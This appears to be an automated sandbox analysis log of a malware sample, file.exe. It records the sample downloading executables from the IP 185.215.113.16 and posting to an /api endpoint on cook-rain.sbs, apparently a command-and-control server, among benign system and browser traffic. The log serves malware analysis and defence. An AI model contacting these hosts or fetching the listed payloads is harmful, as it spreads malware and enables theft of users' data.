              Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hAemhKkDt5V6+5V&MD=5xMo73yv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
              Source: global trafficDNS traffic detected: DNS query: cook-rain.sbs
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
              Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
              Source: file.exe, 00000000.00000003.1650012944.0000000001172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
              Source: file.exe, 00000000.00000002.1672013644.000000000079A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
              Source: file.exe, 00000000.00000003.1549958020.000000000116A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1674087974.0000000001173000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1650012944.0000000001172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
              Source: file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
              Source: chromecache_118.6.drString found in binary or memory: http://schema.org/Organization
              Source: file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://aka.ms/certhelp
              Source: chromecache_118.6.drString found in binary or memory: https://aka.ms/feedback/report?space=61
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://aka.ms/msignite_docs_banner
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://aka.ms/pshelpmechoose
              Source: chromecache_118.6.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
              Source: chromecache_118.6.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
              Source: chromecache_118.6.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
              Source: file.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
              Source: file.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
              Source: file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://channel9.msdn.com/
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
              Source: file.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: file.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.1433901033.000000000119E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/
              Source: file.exe, 00000000.00000002.1673887495.0000000001116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/&MU
              Source: file.exe, 00000000.00000003.1399139750.000000000117F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1400061483.0000000001194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api
              Source: file.exe, 00000000.00000002.1673887495.0000000001116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api22I
              Source: file.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433824466.0000000001196000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433901033.000000000119E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiK
              Source: file.exe, 00000000.00000003.1416543771.0000000001195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiQ
              Source: file.exe, 00000000.00000003.1451659553.000000000119F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1446838460.000000000119F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiT
              Source: file.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apir
              Source: file.exe, 00000000.00000003.1399975749.0000000001180000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1399651193.000000000117F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1399139750.000000000117F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1400061483.0000000001194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apivalue
              Source: file.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1416543771.0000000001195000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433824466.0000000001196000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1399975749.0000000001180000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1399651193.000000000117F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1399139750.000000000117F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433901033.000000000119E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1400061483.0000000001194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/lOr
              Source: file.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1416543771.0000000001195000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1451659553.000000000119F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442655717.000000000119E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433824466.0000000001196000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442496677.000000000119C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1446838460.000000000119F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433901033.000000000119E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/q
              Source: file.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/tLj
              Source: file.exe, 00000000.00000003.1416484757.0000000001180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs:443/api
              Source: file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_118.6.drString found in binary or memory: https://github.com/Thraka
              Source: chromecache_118.6.drString found in binary or memory: https://github.com/Youssef1313
              Source: chromecache_118.6.drString found in binary or memory: https://github.com/adegeo
              Source: chromecache_118.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
              Source: chromecache_118.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
              Source: chromecache_118.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
              Source: chromecache_118.6.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://github.com/dotnet/try
              Source: chromecache_118.6.drString found in binary or memory: https://github.com/gewarren
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://github.com/js-cookie/js-cookie
              Source: chromecache_118.6.drString found in binary or memory: https://github.com/mairaw
              Source: chromecache_118.6.drString found in binary or memory: https://github.com/nschonni
              Source: file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
              Source: chromecache_118.6.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
              Source: chromecache_110.6.drString found in binary or memory: https://schema.org
              Source: file.exe, 00000000.00000003.1418061328.00000000059E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.1418061328.00000000059E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
              Source: chromecache_110.6.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
              Source: file.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
              Source: file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: chromecache_99.6.dr, chromecache_110.6.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
              Source: file.exe, 00000000.00000003.1418061328.00000000059E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: file.exe, 00000000.00000003.1418061328.00000000059E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: file.exe, 00000000.00000003.1418061328.00000000059E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: file.exe, 00000000.00000003.1418061328.00000000059E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.1418061328.00000000059E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
